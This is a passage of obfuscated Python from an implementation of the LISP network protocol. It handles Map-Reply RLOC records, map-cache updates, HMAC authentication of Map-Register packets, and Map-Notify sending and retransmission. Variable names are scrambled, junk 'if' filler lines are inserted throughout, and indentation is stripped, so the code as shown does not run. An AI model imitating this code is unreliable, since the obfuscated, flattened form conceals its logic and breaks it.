if ( O0O0OOoO00 and Ii1II1I == LISP_DROP_ACTION ) :
if ( OOoo . eid . is_local ( ) ) : continue
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo * OoO0O00 . OoooooooOO
if 40 - 40: I1Ii111 + Oo0Ooo + I1Ii111
if 57 - 57: I1Ii111 / II111iiii % iII111i
if 32 - 32: IiII - OOooOOo + i11iIiiIii + I1IiiI . iII111i
if 75 - 75: o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1IiiI / OoO0O00
if 22 - 22: Oo0Ooo / iIii1I11I1II1 + o0oOOo0O0Ooo
if ( OOoo . eid . is_null ( ) ) : continue
if 16 - 16: II111iiii . Ii1I + I1Ii111 % i1IIi / i11iIiiIii + OOooOOo
if 43 - 43: I1IiiI . Oo0Ooo + i1IIi + I11i / OoO0O00
if 66 - 66: i11iIiiIii
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if ( O0O0OOoO00 ) :
OoOoooooO00oo = lisp_map_cache_lookup ( OOoo . eid , OOoo . group )
else :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( OOoo . eid , True )
if 73 - 73: Ii1I . II111iiii
oO0O0i11ii11i1 = ( OoOoooooO00oo == None )
if 88 - 88: o0oOOo0O0Ooo * OoOoOO00 % I1IiiI . OOooOOo / Oo0Ooo
if 74 - 74: I1ii11iIi11i
if 95 - 95: i11iIiiIii + I1ii11iIi11i
if 97 - 97: ooOoO0o * iIii1I11I1II1 * i1IIi * II111iiii - OOooOOo - o0oOOo0O0Ooo
if 37 - 37: II111iiii
if ( OoOoooooO00oo == None ) :
iIiiIIiIII1i1 , OoOO0OOOO0 , oOoOoO0Oo0oo = lisp_allow_gleaning ( OOoo . eid , OOoo . group ,
None )
if ( iIiiIIiIII1i1 ) : continue
else :
if ( OoOoooooO00oo . gleaned ) : continue
if 89 - 89: I11i + I1IiiI - II111iiii
if 4 - 4: I1ii11iIi11i
if 51 - 51: I1Ii111 . O0 - OoOoOO00 + i11iIiiIii * II111iiii
if 39 - 39: iII111i . OoO0O00 % I1IiiI * II111iiii * OoooooooOO . II111iiii
if 97 - 97: oO0o - Ii1I - II111iiii % II111iiii * OOooOOo
iio0OOoO0 = [ ]
for Oo0iIIiiIiiI in range ( OOoo . rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
O0000O00O00OO . keys = iIiiIIiI1I . keys
packet = O0000O00O00OO . decode ( packet , iIiiIIiI1I . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 33 - 33: IiII
O0000O00O00OO . print_record ( " " )
if 82 - 82: iII111i . OOooOOo / II111iiii / II111iiii % Ii1I
iiiIii = None
if ( OoOoooooO00oo ) : iiiIii = OoOoooooO00oo . get_rloc ( O0000O00O00OO . rloc )
if ( iiiIii ) :
OooO0ooO0o0OO = iiiIii
else :
OooO0ooO0o0OO = lisp_rloc ( )
if 82 - 82: O0 . I1Ii111 - IiII
if 37 - 37: i11iIiiIii
if 67 - 67: ooOoO0o . Oo0Ooo
if 15 - 15: OoO0O00 . oO0o - o0oOOo0O0Ooo
if 28 - 28: OOooOOo * OoOoOO00 + OoooooooOO . OOooOOo / oO0o / OoOoOO00
if 94 - 94: OoO0O00 / i1IIi . OoO0O00 . I1Ii111 + OoO0O00
if 30 - 30: o0oOOo0O0Ooo + iIii1I11I1II1 - II111iiii - ooOoO0o + OoOoOO00 - II111iiii
IIi1I1iII111 = OooO0ooO0o0OO . store_rloc_from_record ( O0000O00O00OO , iIiiIIiI1I . nonce ,
source )
OooO0ooO0o0OO . echo_nonce_capable = iIiiIIiI1I . echo_nonce_capable
if 69 - 69: oO0o / O0 / I1IiiI + OoooooooOO * I11i * IiII
if ( OooO0ooO0o0OO . echo_nonce_capable ) :
oOo0O = OooO0ooO0o0OO . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , oOo0O ) == None ) :
lisp_echo_nonce ( oOo0O )
if 41 - 41: ooOoO0o % i11iIiiIii
if 69 - 69: IiII - oO0o
if 21 - 21: Oo0Ooo / I1Ii111
if 72 - 72: OoOoOO00 . i11iIiiIii
if 25 - 25: i1IIi
if 69 - 69: OOooOOo / Ii1I
if 67 - 67: i11iIiiIii . II111iiii + OoooooooOO % o0oOOo0O0Ooo + IiII * i1IIi
if 53 - 53: oO0o * OoooooooOO + II111iiii . IiII * I1ii11iIi11i
if 55 - 55: OoOoOO00
if 27 - 27: I1IiiI
if ( iIiiIIiI1I . rloc_probe and O0000O00O00OO . probe_bit ) :
if ( OooO0ooO0o0OO . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( OooO0ooO0o0OO . rloc , source , IIi1I1iII111 ,
iIiiIIiI1I . nonce , iIiiIIiI1I . hop_count , ttl )
if 81 - 81: Oo0Ooo
if 43 - 43: i1IIi * O0 + ooOoO0o + OoO0O00
if 99 - 99: IiII . OoOoOO00
if 64 - 64: I1Ii111
if 96 - 96: Ii1I
if 100 - 100: ooOoO0o
iio0OOoO0 . append ( OooO0ooO0o0OO )
if 43 - 43: Ii1I * ooOoO0o + O0 . II111iiii
if 8 - 8: IiII * OOooOOo + I11i + O0 * oO0o - oO0o
if 19 - 19: OoO0O00 - ooOoO0o + I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % iIii1I11I1II1
if 5 - 5: OoooooooOO + ooOoO0o - II111iiii . i11iIiiIii / oO0o - ooOoO0o
if ( lisp_data_plane_security and OooO0ooO0o0OO . rloc_recent_rekey ( ) ) :
ooOOoOOoOOoOO = OooO0ooO0o0OO
if 3 - 3: iII111i
if 74 - 74: i11iIiiIii + OoooooooOO . OOooOOo
if 29 - 29: IiII % OoO0O00
if 53 - 53: OoooooooOO - OoOoOO00 / IiII - I1Ii111
if 16 - 16: iIii1I11I1II1 / OOooOOo + I1IiiI * II111iiii . OOooOOo
if 68 - 68: IiII * IiII + oO0o / o0oOOo0O0Ooo
if 41 - 41: OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
if 53 - 53: ooOoO0o + oO0o - II111iiii
if 92 - 92: Oo0Ooo - I11i . ooOoO0o % oO0o
if 6 - 6: iIii1I11I1II1 + oO0o
if ( iIiiIIiI1I . rloc_probe == False and lisp_nat_traversal ) :
i11i1i11ii11I = [ ]
iIIiii = [ ]
for OooO0ooO0o0OO in iio0OOoO0 :
if 76 - 76: II111iiii - O0 . O0 + OoooooooOO - I1Ii111
if 21 - 21: OoO0O00 * ooOoO0o
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if ( OooO0ooO0o0OO . rloc . is_private_address ( ) ) :
OooO0ooO0o0OO . priority = 1
OooO0ooO0o0OO . state = LISP_RLOC_UNREACH_STATE
i11i1i11ii11I . append ( OooO0ooO0o0OO )
iIIiii . append ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) )
continue
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
if 34 - 34: i1IIi % iII111i + Oo0Ooo * OoOoOO00 + OoO0O00
if 37 - 37: I1Ii111 / OoooooooOO
if 19 - 19: Ii1I - O0 + I1IiiI + OoooooooOO + ooOoO0o - Oo0Ooo
if 45 - 45: I1IiiI . OoOoOO00 . OoOoOO00
if 20 - 20: OoOoOO00
if ( OooO0ooO0o0OO . priority == 254 and lisp_i_am_rtr == False ) :
i11i1i11ii11I . append ( OooO0ooO0o0OO )
iIIiii . append ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) )
if 69 - 69: OoOoOO00 * Ii1I % ooOoO0o . OoOoOO00 / oO0o * I1Ii111
if ( OooO0ooO0o0OO . priority != 254 and lisp_i_am_rtr ) :
i11i1i11ii11I . append ( OooO0ooO0o0OO )
iIIiii . append ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) )
if 93 - 93: OoO0O00 % IiII % ooOoO0o . I1IiiI
if 96 - 96: II111iiii
if 73 - 73: II111iiii
if ( iIIiii != [ ] ) :
iio0OOoO0 = i11i1i11ii11I
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( iIIiii ) )
if 81 - 81: I1IiiI + OoO0O00
if 22 - 22: OoO0O00 * OoOoOO00 * I11i * IiII . OoO0O00 . I1ii11iIi11i
if 32 - 32: o0oOOo0O0Ooo - iII111i + i11iIiiIii / ooOoO0o . OoOoOO00 . IiII
if 9 - 9: iIii1I11I1II1
if 66 - 66: iIii1I11I1II1
if 13 - 13: O0 / ooOoO0o
if 64 - 64: i11iIiiIii + I1IiiI / Oo0Ooo - iII111i
i11i1i11ii11I = [ ]
for OooO0ooO0o0OO in iio0OOoO0 :
if ( OooO0ooO0o0OO . json != None ) : continue
i11i1i11ii11I . append ( OooO0ooO0o0OO )
if 26 - 26: I1ii11iIi11i
if ( i11i1i11ii11I != [ ] ) :
OoO = len ( iio0OOoO0 ) - len ( i11i1i11ii11I )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( OoO ) )
if 67 - 67: I1Ii111 * iIii1I11I1II1 / O0 + OoO0O00 * iIii1I11I1II1 % II111iiii
iio0OOoO0 = i11i1i11ii11I
if 13 - 13: Ii1I / ooOoO0o / iII111i % II111iiii * I1IiiI * II111iiii
if 40 - 40: Ii1I / i1IIi . iII111i
if 65 - 65: iIii1I11I1II1 * O0 . II111iiii * o0oOOo0O0Ooo . I1ii11iIi11i * I1IiiI
if 63 - 63: II111iiii . Oo0Ooo % iIii1I11I1II1
if 85 - 85: I1IiiI + i1IIi % I1Ii111
if 76 - 76: i11iIiiIii % i11iIiiIii
if 33 - 33: OOooOOo . ooOoO0o / iIii1I11I1II1 * OOooOOo / oO0o
if 75 - 75: Ii1I - OoOoOO00 . OOooOOo - o0oOOo0O0Ooo - I1ii11iIi11i
if ( iIiiIIiI1I . rloc_probe and OoOoooooO00oo != None ) : iio0OOoO0 = OoOoooooO00oo . rloc_set
if 69 - 69: O0 % I1ii11iIi11i
if 77 - 77: iIii1I11I1II1 . OOooOOo
if 64 - 64: OoOoOO00 - i1IIi * i1IIi / iII111i * OoOoOO00 * OoO0O00
if 61 - 61: OOooOOo
if 51 - 51: Oo0Ooo * OOooOOo / iII111i
I1 = oO0O0i11ii11i1
if ( OoOoooooO00oo and iio0OOoO0 != OoOoooooO00oo . rloc_set ) :
OoOoooooO00oo . delete_rlocs_from_rloc_probe_list ( )
I1 = True
if 80 - 80: I1Ii111 . iIii1I11I1II1
if 33 - 33: OoO0O00 - I11i - Oo0Ooo
if 57 - 57: I1Ii111 % i11iIiiIii
if 36 - 36: O0 . I11i / o0oOOo0O0Ooo + i1IIi + oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
O0O0O0OOO = OoOoooooO00oo . uptime if ( OoOoooooO00oo ) else None
if ( OoOoooooO00oo == None ) :
OoOoooooO00oo = lisp_mapping ( OOoo . eid , OOoo . group , iio0OOoO0 )
OoOoooooO00oo . mapping_source = source
OoOoooooO00oo . map_cache_ttl = OOoo . store_ttl ( )
OoOoooooO00oo . action = OOoo . action
OoOoooooO00oo . add_cache ( I1 )
if 74 - 74: Ii1I + iIii1I11I1II1 . iII111i * OoOoOO00
if 59 - 59: iIii1I11I1II1 * OoooooooOO % O0 / I1IiiI
i1O0OO00 = "Add"
if ( O0O0O0OOO ) :
OoOoooooO00oo . uptime = O0O0O0OOO
OoOoooooO00oo . refresh_time = lisp_get_timestamp ( )
i1O0OO00 = "Replace"
if 96 - 96: Ii1I / OoOoOO00
if 71 - 71: OOooOOo / i1IIi
lprint ( "{} {} map-cache with {} RLOCs" . format ( i1O0OO00 ,
green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) , len ( iio0OOoO0 ) ) )
if 50 - 50: iIii1I11I1II1 * IiII
if 73 - 73: II111iiii
if 4 - 4: II111iiii * o0oOOo0O0Ooo + I11i . II111iiii
if 35 - 35: ooOoO0o - ooOoO0o . i1IIi % oO0o * IiII * I1ii11iIi11i
if 36 - 36: OoOoOO00 % ooOoO0o - Oo0Ooo - OoooooooOO % I1ii11iIi11i / OoOoOO00
if ( lisp_ipc_dp_socket and ooOOoOOoOOoOO != None ) :
lisp_write_ipc_keys ( ooOOoOOoOOoOO )
if 23 - 23: ooOoO0o . O0 % O0 - iIii1I11I1II1 / IiII
if 8 - 8: i11iIiiIii . Oo0Ooo / i11iIiiIii % IiII
if 41 - 41: iII111i * I11i % OoooooooOO * iIii1I11I1II1
if 73 - 73: I1Ii111 * I1ii11iIi11i
if 79 - 79: I11i / O0 % Ii1I % I1ii11iIi11i
if 21 - 21: OoOoOO00 . ooOoO0o * OoO0O00 - OoOoOO00 - OoooooooOO
if 23 - 23: I1Ii111 + iIii1I11I1II1 - o0oOOo0O0Ooo - iII111i - O0 / iIii1I11I1II1
if ( oO0O0i11ii11i1 ) :
Ii1I11IiI1I1 = bold ( "RLOC-probe" , False )
for OooO0ooO0o0OO in OoOoooooO00oo . best_rloc_set :
oOo0O = red ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( Ii1I11IiI1I1 , oOo0O ) )
lisp_send_map_request ( lisp_sockets , 0 , OoOoooooO00oo . eid , OoOoooooO00oo . group , OooO0ooO0o0OO )
if 24 - 24: i1IIi
if 21 - 21: II111iiii
if 27 - 27: I1IiiI * i11iIiiIii
return
if 86 - 86: I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - i1IIi . I11i / OOooOOo
if 78 - 78: I1ii11iIi11i
if 18 - 18: ooOoO0o / I1Ii111 . o0oOOo0O0Ooo % OoOoOO00
if 60 - 60: I1IiiI . Oo0Ooo + ooOoO0o + OoO0O00
if 30 - 30: I1Ii111 * i1IIi
if 4 - 4: OoO0O00 + O0 * OOooOOo * I1Ii111 / O0
if 58 - 58: OOooOOo % ooOoO0o * I1IiiI - I1ii11iIi11i / I11i + iII111i
if 26 - 26: OoOoOO00
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 63 - 63: I1Ii111 . oO0o + OoO0O00 / I1ii11iIi11i % IiII * II111iiii
packet = map_register . zero_auth ( packet )
IiI1I1i1 = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 92 - 92: iIii1I11I1II1 . OoooooooOO . ooOoO0o / II111iiii
if 30 - 30: i1IIi * Ii1I + Ii1I / I1Ii111
if 84 - 84: I1IiiI - Oo0Ooo * OoO0O00 * oO0o
if 13 - 13: I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + oO0o - iII111i
map_register . auth_data = IiI1I1i1
packet = map_register . encode_auth ( packet )
return ( packet )
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if 98 - 98: OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / OoOoOO00 + I1IiiI
if 74 - 74: ooOoO0o . IiII . O0 * I1IiiI * oO0o
if 6 - 6: O0 . Ii1I / Oo0Ooo * o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 30 - 30: I11i
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
iI1i11IIi = hashlib . sha1
if 100 - 100: IiII - iIii1I11I1II1 + O0 + ooOoO0o
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
iI1i11IIi = hashlib . sha256
if 54 - 54: I11i - o0oOOo0O0Ooo . IiII / Oo0Ooo % OoooooooOO
if 66 - 66: OOooOOo
if ( do_hex ) :
IiI1I1i1 = hmac . new ( password , packet , iI1i11IIi ) . hexdigest ( )
else :
IiI1I1i1 = hmac . new ( password , packet , iI1i11IIi ) . digest ( )
if 37 - 37: i1IIi . I1IiiI
return ( IiI1I1i1 )
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if 75 - 75: I11i - II111iiii
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 84 - 84: I1ii11iIi11i * IiII / I1IiiI - Ii1I + IiII - i1IIi
IiI1I1i1 = lisp_hash_me ( packet , alg_id , password , True )
Oo00Oo00O = ( IiI1I1i1 == auth_data )
if 67 - 67: iII111i + OoOoOO00 * o0oOOo0O0Ooo / II111iiii / iIii1I11I1II1
if 12 - 12: o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo
if 45 - 45: OoO0O00 % OoO0O00 % O0
if ( Oo00Oo00O == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( IiI1I1i1 , auth_data ) )
if 62 - 62: IiII - iII111i . I1ii11iIi11i . oO0o
if 22 - 22: OoOoOO00 * i11iIiiIii * Ii1I
return ( Oo00Oo00O )
if 43 - 43: iIii1I11I1II1 / iII111i - Ii1I + I11i % iII111i - OoO0O00
if 5 - 5: OoO0O00 / ooOoO0o
if 92 - 92: Oo0Ooo / iII111i + O0 * ooOoO0o * OOooOOo % Oo0Ooo
if 97 - 97: oO0o / Ii1I
if 70 - 70: iII111i / Oo0Ooo . OoOoOO00 - II111iiii * II111iiii % I1IiiI
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
if 91 - 91: IiII * Ii1I * OOooOOo
def lisp_retransmit_map_notify ( map_notify ) :
oO00o0oOoo = map_notify . etr
IIi1I1iII111 = map_notify . etr_port
if 17 - 17: o0oOOo0O0Ooo + Ii1I % I1ii11iIi11i + IiII % I1Ii111 + I1ii11iIi11i
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( oO00o0oOoo . print_address ( ) , False ) ) )
if 95 - 95: IiII + iII111i % I1IiiI
if 18 - 18: Oo0Ooo
iII1 = map_notify . nonce_key
if ( lisp_map_notify_queue . has_key ( iII1 ) ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( iII1 ) )
if 8 - 8: O0 + iIii1I11I1II1 - O0
try :
lisp_map_notify_queue . pop ( iII1 )
except :
lprint ( "Key not found in Map-Notify queue" )
if 67 - 67: O0
if 22 - 22: I11i / i1IIi . II111iiii % ooOoO0o / I11i - Ii1I
return
if 28 - 28: O0 - Oo0Ooo
if 58 - 58: iIii1I11I1II1 - OoooooooOO - iII111i
IiI1i = map_notify . lisp_sockets
map_notify . retry_count += 1
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# I1Ii111 * I1Ii111 / O0 - O0
red ( oO00o0oOoo . print_address ( ) , False ) , map_notify . retry_count ) )
if 15 - 15: I1ii11iIi11i % ooOoO0o * oO0o * OoO0O00 + OoO0O00
lisp_send_map_notify ( IiI1i , map_notify . packet , oO00o0oOoo , IIi1I1iII111 )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 58 - 58: I1ii11iIi11i
if 93 - 93: i1IIi - IiII + IiII % OoooooooOO / o0oOOo0O0Ooo
if 39 - 39: I1IiiI + Ii1I - O0
if 25 - 25: IiII % iIii1I11I1II1 + ooOoO0o % iII111i - OoO0O00
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 36 - 36: OoooooooOO / oO0o + IiII . I1IiiI - o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 53 - 53: oO0o
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
eid_record . rloc_count = len ( parent . registered_rlocs )
III1I = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 96 - 96: i11iIiiIii * I11i * ooOoO0o % i1IIi * i1IIi
if 84 - 84: i11iIiiIii - IiII * O0
if 89 - 89: OoooooooOO / iII111i
if 98 - 98: IiII . OOooOOo * ooOoO0o / OoO0O00
for i1IIiOoO000o00o00O in parent . registered_rlocs :
O0000O00O00OO = lisp_rloc_record ( )
O0000O00O00OO . store_rloc_entry ( i1IIiOoO000o00o00O )
III1I += O0000O00O00OO . encode ( )
O0000O00O00OO . print_record ( " " )
del ( O0000O00O00OO )
if 9 - 9: O0 / iIii1I11I1II1
if 95 - 95: ooOoO0o * OoO0O00 % OoooooooOO % OoO0O00
if 79 - 79: II111iiii % Ii1I * oO0o * iII111i + II111iiii
if 51 - 51: I1IiiI + iII111i + I1IiiI / Ii1I * IiII + OOooOOo
if 70 - 70: I11i . IiII + IiII
for i1IIiOoO000o00o00O in parent . registered_rlocs :
oO00o0oOoo = i1IIiOoO000o00o00O . rloc
oooO0oo0ooO = lisp_map_notify ( lisp_sockets )
oooO0oo0ooO . record_count = 1
o0O = map_register . key_id
oooO0oo0ooO . key_id = o0O
oooO0oo0ooO . alg_id = map_register . alg_id
oooO0oo0ooO . auth_len = map_register . auth_len
oooO0oo0ooO . nonce = map_register . nonce
oooO0oo0ooO . nonce_key = lisp_hex_string ( oooO0oo0ooO . nonce )
oooO0oo0ooO . etr . copy_address ( oO00o0oOoo )
oooO0oo0ooO . etr_port = map_register . sport
oooO0oo0ooO . site = parent . site
ii1i1II = oooO0oo0ooO . encode ( III1I , parent . site . auth_key [ o0O ] )
oooO0oo0ooO . print_notify ( )
if 79 - 79: i11iIiiIii * OoooooooOO
if 50 - 50: I1IiiI * II111iiii . I1Ii111 / I1Ii111
if 28 - 28: ooOoO0o
if 27 - 27: OoO0O00
iII1 = oooO0oo0ooO . nonce_key
if ( lisp_map_notify_queue . has_key ( iII1 ) ) :
o00o0o0O = lisp_map_notify_queue [ iII1 ]
o00o0o0O . retransmit_timer . cancel ( )
del ( o00o0o0O )
if 98 - 98: II111iiii + ooOoO0o - iIii1I11I1II1 . I11i . iIii1I11I1II1 - iIii1I11I1II1
lisp_map_notify_queue [ iII1 ] = oooO0oo0ooO
if 91 - 91: ooOoO0o
if 66 - 66: OOooOOo
if 5 - 5: i1IIi * OoOoOO00 + i1IIi % I11i
if 79 - 79: OOooOOo % iIii1I11I1II1 / OoOoOO00
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( oO00o0oOoo . print_address ( ) , False ) ) )
if 9 - 9: Ii1I
lisp_send ( lisp_sockets , oO00o0oOoo , LISP_CTRL_PORT , ii1i1II )
if 44 - 44: iII111i
parent . site . map_notifies_sent += 1
if 46 - 46: I11i . i11iIiiIii * OoOoOO00 + o0oOOo0O0Ooo / ooOoO0o
if 37 - 37: OoO0O00 - Ii1I + OoO0O00
if 49 - 49: OoooooooOO - I1ii11iIi11i % I1ii11iIi11i / i1IIi . ooOoO0o
if 60 - 60: Oo0Ooo
oooO0oo0ooO . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ oooO0oo0ooO ] )
oooO0oo0ooO . retransmit_timer . start ( )
if 46 - 46: OoOoOO00 + i1IIi
return
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
if 17 - 17: O0 % O0 / I1ii11iIi11i . Oo0Ooo . iII111i
if 4 - 4: OoO0O00
if 65 - 65: Oo0Ooo % O0 / I1Ii111 * IiII - oO0o
if 32 - 32: Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 38 - 38: iII111i * OoooooooOO - IiII
iII1 = lisp_hex_string ( nonce ) + source . print_address ( )
if 36 - 36: I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
if 91 - 91: O0 + I1Ii111 * II111iiii - O0 . i11iIiiIii . Oo0Ooo
if 54 - 54: ooOoO0o * I11i / I1ii11iIi11i % ooOoO0o
if 76 - 76: I11i . I1IiiI
if 66 - 66: oO0o % oO0o * IiII
if 39 - 39: i1IIi * Ii1I + OoOoOO00 / oO0o
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( lisp_map_notify_queue . has_key ( iII1 ) ) :
oooO0oo0ooO = lisp_map_notify_queue [ iII1 ]
o0 = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( oooO0oo0ooO . nonce ) , o0 ) )
if 6 - 6: I1ii11iIi11i / II111iiii / OoOoOO00 . i11iIiiIii - iII111i
return
if 43 - 43: i11iIiiIii * i11iIiiIii * I1Ii111
if 80 - 80: oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / o0oOOo0O0Ooo % OoooooooOO
oooO0oo0ooO = lisp_map_notify ( lisp_sockets )
oooO0oo0ooO . record_count = record_count
key_id = key_id
oooO0oo0ooO . key_id = key_id
oooO0oo0ooO . alg_id = alg_id
oooO0oo0ooO . auth_len = auth_len
oooO0oo0ooO . nonce = nonce
oooO0oo0ooO . nonce_key = lisp_hex_string ( nonce )
oooO0oo0ooO . etr . copy_address ( source )
oooO0oo0ooO . etr_port = port
oooO0oo0ooO . site = site
oooO0oo0ooO . eid_list = eid_list
if 31 - 31: o0oOOo0O0Ooo - OoO0O00 % I1IiiI
if 23 - 23: OOooOOo
if 97 - 97: Oo0Ooo / OoooooooOO . OoooooooOO
if 47 - 47: OoO0O00
if ( map_register_ack == False ) :
iII1 = oooO0oo0ooO . nonce_key
lisp_map_notify_queue [ iII1 ] = oooO0oo0ooO
if 52 - 52: I1IiiI * iIii1I11I1II1 % oO0o * IiII % oO0o
if 9 - 9: I11i
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 83 - 83: i11iIiiIii
if 72 - 72: oO0o + II111iiii . O0 * oO0o + iII111i
if 22 - 22: I11i + Ii1I . IiII - OoO0O00 - o0oOOo0O0Ooo
if 84 - 84: OoooooooOO - Oo0Ooo
if 86 - 86: O0 + OoO0O00 + O0 . I1IiiI
ii1i1II = oooO0oo0ooO . encode ( eid_records , site . auth_key [ key_id ] )
oooO0oo0ooO . print_notify ( )
if 82 - 82: OoOoOO00
if ( map_register_ack == False ) :
OOoo = lisp_eid_record ( )
OOoo . decode ( eid_records )
OOoo . print_record ( " " , False )
if 61 - 61: oO0o . o0oOOo0O0Ooo
if 82 - 82: Oo0Ooo * OoooooooOO / ooOoO0o / I1IiiI
if 70 - 70: I1IiiI
if 74 - 74: ooOoO0o * II111iiii
if 96 - 96: i11iIiiIii . I1IiiI - II111iiii . I11i
lisp_send_map_notify ( lisp_sockets , ii1i1II , oooO0oo0ooO . etr , port )
site . map_notifies_sent += 1
if 79 - 79: OoO0O00 . OoOoOO00 - i1IIi + Ii1I * i11iIiiIii . OoooooooOO
if ( map_register_ack ) : return
if 83 - 83: o0oOOo0O0Ooo / oO0o
if 24 - 24: Ii1I + oO0o / OoooooooOO % i11iIiiIii
if 1 - 1: iII111i / I1Ii111 * I1IiiI + OoOoOO00 . OoooooooOO
if 5 - 5: I1IiiI
if 74 - 74: i1IIi * Oo0Ooo - OoOoOO00 * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1 * IiII / i11iIiiIii - ooOoO0o - o0oOOo0O0Ooo
oooO0oo0ooO . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ oooO0oo0ooO ] )
oooO0oo0ooO . retransmit_timer . start ( )
return
if 30 - 30: OoOoOO00 - OOooOOo . Oo0Ooo
if 11 - 11: IiII - I1Ii111 - OoO0O00 * o0oOOo0O0Ooo
if 99 - 99: O0 - OoO0O00
